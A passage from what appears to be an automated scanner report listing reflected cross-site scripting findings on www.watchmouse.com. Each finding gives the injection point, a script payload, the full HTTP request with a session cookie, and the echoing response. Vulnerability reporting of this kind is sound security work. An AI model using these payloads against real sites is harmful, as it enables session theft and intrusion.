The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e070"><script>alert(1)</script>8f9c1b74449 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/worldwide.php3e070"><script>alert(1)</script>8f9c1b74449 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-56e0a2d65b22e9dda7f1ab797f7388fd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/worldwide.php3e070"><script>alert(1)</script>8f9c1b74449" method="post">
...[SNIP]...

1.240. http://www.watchmouse.com/en/worldwide.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/worldwide.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41bde"><script>alert(1)</script>c330fe7c84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/worldwide.php?41bde"><script>alert(1)</script>c330fe7c84e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-960d512525d5aadfede9ed6bc4b21f1c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/worldwide.php?41bde"><script>alert(1)</script>c330fe7c84e=1" method="post">
...[SNIP]...

1.241. http://www.watchmouse.com/es/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The value of the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50843"><script>alert(1)</script>de419318d3b was submitted in the 3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=150843"><script>alert(1)</script>de419318d3b HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7544b909c71ca1b84e7fd5a691036b16"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/?3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0=150843"><script>alert(1)</script>de419318d3b" method="post">
...[SNIP]...

1.242. http://www.watchmouse.com/es/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bd2"><script>alert(1)</script>541767a909d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es39bd2"><script>alert(1)</script>541767a909d/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-738c1f82501e529dc0a8294d7aa8c73e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es39bd2"><script>alert(1)</script>541767a909d/" method="post">
...[SNIP]...

1.243. http://www.watchmouse.com/es/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a07"><script>alert(1)</script>70e6b4480e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/?a8a07"><script>alert(1)</script>70e6b4480e5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-b6dc7a7a315fe254b82cdced89ee6c50"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/?a8a07"><script>alert(1)</script>70e6b4480e5=1" method="post">
...[SNIP]...

1.244. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81483"><script>alert(1)</script>f25f26fa0b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es81483"><script>alert(1)</script>f25f26fa0b3/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-073e769c4dc112b4bee124efeff04e36"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es81483"><script>alert(1)</script>f25f26fa0b3/feature/public-status-page.html" method="post">
...[SNIP]...

1.245. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c043d"><script>alert(1)</script>8e665d0ff3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/featurec043d"><script>alert(1)</script>8e665d0ff3d/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:14 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-d1df99b98c9397290a26ad8915235d23"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/featurec043d"><script>alert(1)</script>8e665d0ff3d/public-status-page.html" method="post">
...[SNIP]...

1.246. http://www.watchmouse.com/es/feature/public-status-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a333"><script>alert(1)</script>887c299eaed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/public-status-page.html2a333"><script>alert(1)</script>887c299eaed HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:18 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-8f5f5f4b7cfc602b385d6a823c158215"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/feature/public-status-page.html2a333"><script>alert(1)</script>887c299eaed" method="post">
...[SNIP]...

1.247. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b6d"><script>alert(1)</script>5e8ad6b99f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es29b6d"><script>alert(1)</script>5e8ad6b99f8/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:58 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-abd31242d4af91393c76c2ce35c30739"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es29b6d"><script>alert(1)</script>5e8ad6b99f8/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.248. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0739"><script>alert(1)</script>f04d8aa328c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/featuree0739"><script>alert(1)</script>f04d8aa328c/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-703662b09080e7242803a3a2dcc9d6d4"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/featuree0739"><script>alert(1)</script>f04d8aa328c/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.249. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8216d"><script>alert(1)</script>42af676627e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/transaction-monitoring-web-application-testing.html8216d"><script>alert(1)</script>42af676627e HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-ae1a82571973bf14e37457bbf555d82b"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html8216d"><script>alert(1)</script>42af676627e" method="post">
...[SNIP]...

1.250. http://www.watchmouse.com/es/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a01d"><script>alert(1)</script>3c92cc3fd31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/feature/transaction-monitoring-web-application-testing.html?2a01d"><script>alert(1)</script>3c92cc3fd31=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-8d387855bd801062967559c68a5b20b7"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="/es/feature/transaction-monitoring-web-application-testing.html?2a01d"><script>alert(1)</script>3c92cc3fd31=1" method="post">
...[SNIP]...

1.251. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62876"><script>alert(1)</script>d2d2780bcae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /es62876"><script>alert(1)</script>d2d2780bcae/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0a3579cd3b01874a09d3cca2175346c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/es62876"><script>alert(1)</script>d2d2780bcae/learn_more.php" method="post">
...[SNIP]...

1.252. http://www.watchmouse.com/es/learn_more.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /es/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217b6"><script>alert(1)</script>2004774d5d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /es/learn_more.php217b6"><script>alert(1)</script>2004774d5d3 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-es-7c1339481a4d648e17edf0a1924c1158"
Content-Language: es
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/es/learn_more.php217b6"><script>alert(1)</script>2004774d5d3" method="post">
...[SNIP]...

1.253. http://www.watchmouse.com/es/learn_more.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
